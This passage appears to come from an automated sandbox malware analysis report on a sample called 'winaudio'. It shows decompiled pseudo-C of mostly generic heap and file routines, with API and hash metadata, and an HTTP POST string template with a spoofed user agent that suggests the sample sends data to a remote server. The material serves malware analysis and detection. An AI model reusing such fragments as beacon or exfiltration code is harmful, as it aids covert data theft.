                        0x0037ba64
                        0x0037ba73
                        0x0037ba78
                        0x0037ba7a
                        0x0037ba9e
                        0x0037baa3
                        0x0037baaf
                        0x0037babc
                        0x0037bacc
                        0x0037bad9
                        0x0037baf7
                        0x0037bafd
                        0x0037bb06
                        0x0037bb10
                        0x0037bb10
                        0x0037bb12
                        0x0037bb13
                        0x0037bb13
                        0x0037bb21
                        0x0037bb2f
                        0x0037bb3c
                        0x0037bb66
                        0x0037bb6b
                        0x0037bb6d
                        0x0037bb99
                        0x0037bbb1
                        0x0037bbb7
                        0x0037bbbd
                        0x0037bbc8
                        0x0037bbcd
                        0x0037bbd7
                        0x0037bb6f
                        0x0037bb70
                        0x0037bb76
                        0x0037bb81
                        0x0037bb86
                        0x0037bb90
                        0x0037bb90
                        0x0037ba7c
                        0x0037ba7d
                        0x0037ba88
                        0x0037ba8d
                        0x0037ba97
                        0x0037ba97
                        0x0037ba33
                        0x0037ba43
                        0x0037ba43

                        Strings
                        • POST %s HTTP/1.1Connection:closeAccept-Language:utf-8Content-Length:%dContent-Type:application/octet-stream charset=utf-8host:%sUser-Agent:Mozilla/5.0, xrefs: 0037BAF1
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID: POST %s HTTP/1.1Connection:closeAccept-Language:utf-8Content-Length:%dContent-Type:application/octet-stream charset=utf-8host:%sUser-Agent:Mozilla/5.0
                        • API String ID: 0-2482397814
                        • Opcode ID: 9a42ba410852d712645ec342bf8dd20efed07ef2883029246721ece6c6b0983c
                        • Instruction ID: 425d736cf96b1c61c65aece78b4d32257e7e4ef4d3dac820aa1c80a5147119ce
                        • Opcode Fuzzy Hash: 9a42ba410852d712645ec342bf8dd20efed07ef2883029246721ece6c6b0983c
                        • Instruction Fuzzy Hash: 4251D8B1900218ABCF21EF64DC81FEEB7B8EF45310F0040E9FA0D67142D675A9958F64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00392098 Relevance: 3.1, APIs: 2, Instructions: 77fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 83%
                        			E00392098(void* __ebx, void* __edi, signed int* _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v9;
				void _v5128;
				intOrPtr _v5132;
				long _v5136;
				void* _v5140;
				void* __esi;
				signed int _t31;
				intOrPtr _t37;
				int _t41;
				long _t45;
				char _t46;
				intOrPtr* _t49;
				void* _t54;
				void* _t57;
				char* _t59;
				long _t60;
				signed int* _t63;
				void* _t64;
				signed int _t65;

				E00397C10();
				_t31 =  *0x3e1008; // 0x847b54ee
				_v8 = _t31 ^ _t65;
				_t51 = _a8;
				_t49 = _a12;
				_t63 = _a4;
				_t54 =  *( *((intOrPtr*)(0x3f0290 + (_a8 >> 6) * 4)) + 0x18 + (_t51 & 0x0000003f) * 0x30);
				 *_t63 =  *_t63 & 0x00000000;
				_t37 = _a16 + _t49;
				_t63[1] = _t63[1] & 0x00000000;
				_t63[2] = _t63[2] & 0x00000000;
				_v5140 = _t54;
				_v5132 = _t37;
				while(_t49 < _t37) {
					_t59 =  &_v5128;
					while(_t49 < _t37) {
						_t46 =  *_t49;
						_t49 = _t49 + 1;
						if(_t46 == 0xa) {
							_t63[2] = _t63[2] + 1;
							 *_t59 = 0xd;
							_t59 = _t59 + 1;
						}
						 *_t59 = _t46;
						_t59 = _t59 + 1;
						_t37 = _v5132;
						if(_t59 <  &_v9) {
							continue;
						}
						break;
					}
					_t60 = _t59 -  &_v5128;
					_t41 = WriteFile(_t54,  &_v5128, _t60,  &_v5136, 0); // executed
					if(_t41 == 0) {
						 *_t63 = GetLastError();
					} else {
						_t45 = _v5136;
						_t63[1] = _t63[1] + _t45;
						if(_t45 >= _t60) {
							_t37 = _v5132;
							_t54 = _v5140;
							continue;
						}
					}
					L12:
					_pop(_t64);
					return E002E056D(_v8 ^ _t65, _t57, _t64);
				}
				goto L12;
			}























                        0x003920a2
                        0x003920a7
                        0x003920ae
                        0x003920b1
                        0x003920c0
                        0x003920cb
                        0x003920cf
                        0x003920d6
                        0x003920d9
                        0x003920db
                        0x003920df
                        0x003920e3
                        0x003920e9
                        0x00392156
                        0x003920f1
                        0x003920f7
                        0x003920fb
                        0x003920fd
                        0x00392100
                        0x00392102
                        0x00392105
                        0x00392108
                        0x00392108
                        0x00392109
                        0x0039210e
                        0x00392111
                        0x00392117
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00392117
                        0x0039211f
                        0x00392133
                        0x0039213b
                        0x00392162
                        0x0039213d
                        0x0039213d
                        0x00392143
                        0x00392148
                        0x0039214a
                        0x00392150
                        0x00000000
                        0x00392150
                        0x00392148
                        0x00392164
                        0x0039216a
                        0x00392176
                        0x00392176
                        0x00000000

                        APIs
                        • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,003925D4,?,00000000,00000000,00000000,00000000,0000000C), ref: 00392133
                        • GetLastError.KERNEL32(?,003925D4,?,00000000,00000000,00000000,00000000,0000000C,00000000,003819CE,?,?,?,?,00000000,?), ref: 0039215C
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ErrorFileLastWrite
                        • String ID:
                        • API String ID: 442123175-0
                        • Opcode ID: 9a9c2f294bd944f2c436dc4e0cc49a0c2601e924e175d0293ba7e9d80cdf34d1
                        • Instruction ID: a198a288824b1a75af4ca9794790fee7f20cc2b55e64bba88a57e3adb9b32721
                        • Opcode Fuzzy Hash: 9a9c2f294bd944f2c436dc4e0cc49a0c2601e924e175d0293ba7e9d80cdf34d1
                        • Instruction Fuzzy Hash: 4A218235A10219AFCF16CF59DC80AEAB3F9FB48301F1044AAE546D7351D670AD95CF64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038B8FF Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0038B8FF(void* _a4) {
				char _t3;
				intOrPtr* _t4;
				intOrPtr _t6;

				if(_a4 != 0) {
					_t3 = RtlFreeHeap( *0x3f06d4, 0, _a4); // executed
					if(_t3 == 0) {
						_t4 = E00380E9E();
						_t6 = E00380E25(GetLastError());
						 *_t4 = _t6;
						return _t6;
					}
				}
				return _t3;
			}






                        0x0038b908
                        0x0038b915
                        0x0038b91d
                        0x0038b920
                        0x0038b92e
                        0x0038b934
                        0x00000000
                        0x0038b936
                        0x0038b91d
                        0x0038b938

                        APIs
                        • RtlFreeHeap.NTDLL(00000000,00000000,?,00390F92,?,00000000,?,00000000,?,00390FB9,?,00000007,?,?,00391435,?), ref: 0038B915
                        • GetLastError.KERNEL32(?,?,00390F92,?,00000000,?,00000000,?,00390FB9,?,00000007,?,?,00391435,?,?), ref: 0038B927
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 485612231-0
                        • Opcode ID: 5d4e64530109b5bd68ee1b6253bc94e0e41ac58a08e8bdbe5be88dde2c49d77d
                        • Instruction ID: 04e7f20ba1d77d980541da9afc29a304b72a95a1112643c38a7dc3fe583e35de
                        • Opcode Fuzzy Hash: 5d4e64530109b5bd68ee1b6253bc94e0e41ac58a08e8bdbe5be88dde2c49d77d
                        • Instruction Fuzzy Hash: 8BE0CD32000705BBDF173FB4EC09B667FACDB94354F114855F648DA160D7359850C754
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00391B1A Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E00391B1A(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* _t4;
				long _t7;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = RtlReAllocateHeap( *0x3f06d4, 0, _t14, _t16); // executed
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00384E75();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E00383A6D(_t10, _t13, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E00380E9E())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E0038B8FF(_t14);
					goto L6;
				}
				return E0038B939(__ecx, _a8);
			}








                        0x00391b1a
                        0x00391b1a
                        0x00391b20
                        0x00391b25
                        0x00391b33
                        0x00391b36
                        0x00391b38
                        0x00391b43
                        0x00391b46
                        0x00391b6d
                        0x00391b77
                        0x00391b7d
                        0x00391b7f
                        0x00000000
                        0x00000000
                        0x00391b5e
                        0x00391b60
                        0x00000000
                        0x00000000
                        0x00391b63
                        0x00391b68
                        0x00391b69
                        0x00391b6b
                        0x00000000
                        0x00000000
                        0x00391b6b
                        0x00391b55
                        0x00000000
                        0x00391b55
                        0x00391b48
                        0x00391b4d
                        0x00391b53
                        0x00391b53
                        0x00391b53
                        0x00000000
                        0x00391b53
                        0x00391b3b
                        0x00000000
                        0x00391b40
                        0x00000000

                        APIs
                          • Part of subcall function 0038B939: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0038B96B
                        • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004), ref: 00391B77
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: bd03fd43caee29fb966d599b2027857428b41506622be946b53fe2d31b7f1b59
                        • Instruction ID: e4178d4e92db33584999c23ca6becd4aced94d1af4668b117e387a8c53d8da6d
                        • Opcode Fuzzy Hash: bd03fd43caee29fb966d599b2027857428b41506622be946b53fe2d31b7f1b59
                        • Instruction Fuzzy Hash: C6F062326412176ACF233B26AC01F6A775E9FD1BB1F168165F854BA291FB70D90092A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038B987 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 95%
                        			E0038B987(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t16;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x3f06d4, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00384E75();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00380E9E())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00383A6D(_t15, _t16, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t16 = _t13 % _t18;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}










                        0x0038b987
                        0x0038b98d
                        0x0038b992
                        0x0038b9a0
                        0x0038b9a0
                        0x0038b9a6
                        0x0038b9a8
                        0x0038b9a8
                        0x0038b9bf
                        0x0038b9c8
                        0x0038b9d0
                        0x00000000
                        0x00000000
                        0x0038b9b0
                        0x0038b9b2
                        0x0038b9d4
                        0x0038b9d9
                        0x0038b9df
                        0x00000000
                        0x0038b9df
                        0x0038b9b5
                        0x0038b9ba
                        0x0038b9bb
                        0x0038b9bd
                        0x00000000
                        0x00000000
                        0x0038b9bd
                        0x00000000
                        0x0038b9bf
                        0x0038b998
                        0x0038b999
                        0x0038b99e
                        0x00000000
                        0x00000000
                        0x00000000

                        APIs
                        • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0038B9C8
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 074f9cd493eba4ee6a42b389aa43ca05b25c54efbecf349bd39775fe15009c05
                        • Instruction ID: ae431634b96f5e8abd781236eb798330b98ca594d2fb93c24e79083100dc738c
                        • Opcode Fuzzy Hash: 074f9cd493eba4ee6a42b389aa43ca05b25c54efbecf349bd39775fe15009c05
                        • Instruction Fuzzy Hash: CFF0B431204737A7DB677A269C01B6BB74C9F417A0B1A4092EA54EA691CB30EC0087E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002DDC20 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                        • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,002DE588), ref: 002DDC3C
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: InfoNativeSystem
                        • String ID:
                        • API String ID: 1721193555-0
                        • Opcode ID: ecdda9a673aa9c4ad120662fb8488907e36466e9a97d785b2531d9cb3e5444bc
                        • Instruction ID: 86e7f2794b7523cd3b5f7e454a81066513d7a7629b9c383321aff3c954275890
                        • Opcode Fuzzy Hash: ecdda9a673aa9c4ad120662fb8488907e36466e9a97d785b2531d9cb3e5444bc
                        • Instruction Fuzzy Hash: 4CF0CD31D6454D8BDB10CB64D9513BAB3E8E748304F9002ABE889E7290EB669EA0C791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038B939 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 94%
                        			E0038B939(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00380E9E())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x3f06d4, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00384E75();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00383A6D(_t7, _t8, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}








                        0x0038b939
                        0x0038b93f
                        0x0038b945
                        0x0038b977
                        0x0038b97c
                        0x0038b982
                        0x00000000
                        0x0038b982
                        0x0038b949
                        0x0038b94b
                        0x0038b94b
                        0x0038b962
                        0x0038b96b
                        0x0038b973
                        0x00000000
                        0x00000000
                        0x0038b953
                        0x0038b955
                        0x00000000
                        0x00000000
                        0x0038b958
                        0x0038b95d
                        0x0038b95e
                        0x0038b960
                        0x00000000
                        0x00000000
                        0x0038b960
                        0x00000000

                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0038B96B
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 871653fd04fa7c9f2343c7f49a5a1819f5d59c47dc2eb4b470296547dc2527b3
                        • Instruction ID: 1d839078555dd44f4c938caa75ec76638f1dbbc1beabffdaaa54108d9f43d910
                        • Opcode Fuzzy Hash: 871653fd04fa7c9f2343c7f49a5a1819f5d59c47dc2eb4b470296547dc2527b3
                        • Instruction Fuzzy Hash: A9E09B3110171397EA333B699C01B6BFA8C9F427B0F1601D1EE54AA591DB64DD4083E5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002DD1B0 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E002DD1B0(intOrPtr* __ecx, void* __edx, void* __eflags) {
				void* __esi;
				intOrPtr* _t3;
				intOrPtr* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t13;
				intOrPtr* _t14;

				_t12 = __ecx; // executed
				_t3 = E002E057E(__edx, _t13, __eflags, 0x40); // executed
				_t14 = _t3;
				if(_t14 != 0) {
					 *_t14 =  *_t12;
				}
				_t1 = _t14 + 4; // 0x4
				_t8 = _t1;
				if(_t8 != 0) {
					 *_t8 =  *_t12;
				}
				_t2 = _t14 + 8; // 0x8
				_t9 = _t2;
				if(_t9 != 0) {
					 *_t9 =  *_t12;
				}
				return _t14;
			}










                        0x002dd1b4
                        0x002dd1b6
                        0x002dd1bb
                        0x002dd1c2
                        0x002dd1c6
                        0x002dd1c6
                        0x002dd1c8
                        0x002dd1c8
                        0x002dd1cd
                        0x002dd1d1
                        0x002dd1d1
                        0x002dd1d3
                        0x002dd1d3
                        0x002dd1d8
                        0x002dd1dc
                        0x002dd1dc
                        0x002dd1e2

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cd73beec8fe924752949974b759de224825006c2432140b6febc7cd6575c4891
                        • Instruction ID: 73abdc0b1403979c04d6f09b4cbf78935fc9751bfdefcce086d0bee251a94ecf
                        • Opcode Fuzzy Hash: cd73beec8fe924752949974b759de224825006c2432140b6febc7cd6575c4891
                        • Instruction Fuzzy Hash: 2FE01A757026128BD7398E59D890A97B7A0FF41B90728042ED95A8B314D775ED62CBC0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 002D3C00 Relevance: 36.2, APIs: 11, Strings: 9, Instructions: 1203COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 70%
                        			E002D3C00(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi) {
				signed int _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _v48;
				signed int _v52;
				signed int _v56;
				signed char _v72;
				signed int _v76;
				signed int _v80;
				signed char _v96;
				signed int _v100;
				signed int _v104;
				signed char _v120;
				signed int _v124;
				signed int _v128;
				signed char _v144;
				signed int _v148;
				signed int _v152;
				signed char _v168;
				signed int _v172;
				signed int _v176;
				signed char _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				intOrPtr _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				intOrPtr _v240;
				intOrPtr* _v244;
				intOrPtr _v248;
				void* __esi;
				void* __ebp;
				signed int _t355;
				signed int _t356;
				signed int _t359;
				signed int _t361;
				intOrPtr _t367;
				signed int _t369;
				signed int _t370;
				signed int _t372;
				intOrPtr _t382;
				void* _t386;
				intOrPtr _t389;
				void* _t393;
				intOrPtr _t394;
				signed int _t396;
				void* _t397;
				signed int _t398;
				signed int _t402;
				void* _t403;
				signed int _t404;
				char* _t408;
				signed int _t409;
				char* _t411;
				char* _t415;
				signed int _t420;
				void* _t421;
				signed int _t422;
				char* _t425;
				char* _t428;
				signed int _t429;
				char* _t432;
				char* _t435;
				signed int _t436;
				char* _t438;
				signed int _t439;
				signed int _t441;
				char* _t444;
				signed int _t445;
				char* _t447;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				char* _t454;
				char* _t458;
				char* _t462;
				signed short _t465;
				signed int _t466;
				void* _t467;
				signed int _t468;
				signed int _t481;
				void* _t485;
				signed int _t494;
				void* _t495;
				signed int _t496;
				signed int _t499;
				signed int _t500;
				signed int _t501;
				signed int _t511;
				signed int _t512;
				intOrPtr _t517;
				signed int _t522;
				void* _t523;
				signed int _t524;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed char _t536;
				signed char _t540;
				signed char _t544;
				signed char _t548;
				signed char _t552;
				signed char _t556;
				signed char _t560;
				signed int _t573;
				signed int _t575;
				signed int _t578;
				signed int _t579;
				char* _t581;
				signed int _t582;
				signed int _t594;
				void* _t595;
				signed int _t596;
				signed int _t598;
				void* _t604;
				signed int _t605;
				void* _t606;
				signed int _t607;
				signed int _t612;
				signed int _t613;
				intOrPtr* _t625;
				intOrPtr* _t626;
				char* _t635;
				signed int _t636;
				intOrPtr* _t638;
				intOrPtr* _t640;
				intOrPtr* _t644;
				char* _t645;
				signed int _t646;
				intOrPtr* _t649;
				intOrPtr* _t650;
				signed int _t651;
				char* _t653;
				signed int _t654;
				char* _t658;
				signed int _t659;
				char* _t661;
				signed int _t662;
				char* _t665;
				signed int _t666;
				intOrPtr* _t668;
				intOrPtr* _t670;
				intOrPtr* _t672;
				intOrPtr _t702;
				signed char _t705;
				void* _t706;
				signed char _t707;
				void* _t708;
				signed char _t709;
				void* _t710;
				signed char _t711;
				void* _t712;
				signed char _t713;
				void* _t714;
				signed char _t715;
				void* _t716;
				signed char _t717;
				void* _t718;
				signed int _t726;
				signed int _t727;
				signed int _t729;
				intOrPtr* _t730;
				signed int _t731;
				intOrPtr* _t733;
				signed int _t734;
				intOrPtr* _t741;
				intOrPtr* _t742;
				intOrPtr* _t743;
				intOrPtr* _t744;
				intOrPtr* _t747;
				intOrPtr* _t748;
				signed int _t751;
				intOrPtr* _t752;
				signed char* _t755;
				signed int _t756;
				signed int _t758;
				intOrPtr _t759;
				intOrPtr* _t760;
				void* _t761;
				signed int _t762;
				void* _t763;
				void* _t764;
				intOrPtr* _t765;
				signed int _t766;
				signed int _t767;
				char* _t768;
				void* _t769;
				char* _t770;
				char* _t771;
				char* _t772;
				signed int _t773;
				signed int _t775;
				intOrPtr* _t777;
				intOrPtr _t778;
				signed int _t779;
				void* _t780;
				intOrPtr _t781;
				void* _t782;
				void* _t783;
				void* _t784;
				void* _t786;
				void* _t787;
				void* _t788;
				signed int _t789;
				intOrPtr* _t790;
				intOrPtr* _t792;
				void* _t793;
				signed int _t794;
				intOrPtr* _t795;
				signed int _t797;
				signed int _t798;
				intOrPtr* _t799;
				void* _t800;
				signed int _t801;
				signed int _t803;
				intOrPtr* _t804;
				signed int _t806;
				intOrPtr* _t807;
				intOrPtr* _t809;
				void* _t810;
				intOrPtr* _t811;
				void* _t812;
				void* _t813;
				void* _t814;
				void* _t815;
				void* _t816;
				void* _t817;
				void* _t818;
				signed int _t820;
				signed int _t821;
				intOrPtr* _t822;
				void* _t827;

				_t740 = __edx;
				_push(0xffffffff);
				_push(0x39c5dc);
				_push( *[fs:0x0]);
				_t781 = _t780 - 0xe8;
				_t355 =  *0x3e1008; // 0x847b54ee
				_t356 = _t355 ^ _t779;
				_v24 = _t356;
				_push(__ebx);
				_push(_t761);
				_push(__edi);
				_push(_t356);
				 *[fs:0x0] =  &_v16;
				_v20 = _t781;
				_v212 = __ecx;
				_v240 = __ecx;
				_v232 = 0;
				_v216 = 0;
				_v220 = 0xffffffff;
				_v224 = 0;
				_v228 = 0;
				_v8 = 0;
				E002E5080(__edi, _t761, _t827);
				_t359 =  *0x3ebaf0; // 0x6556
				_t755 =  *((intOrPtr*)(__ecx + 0x1c));
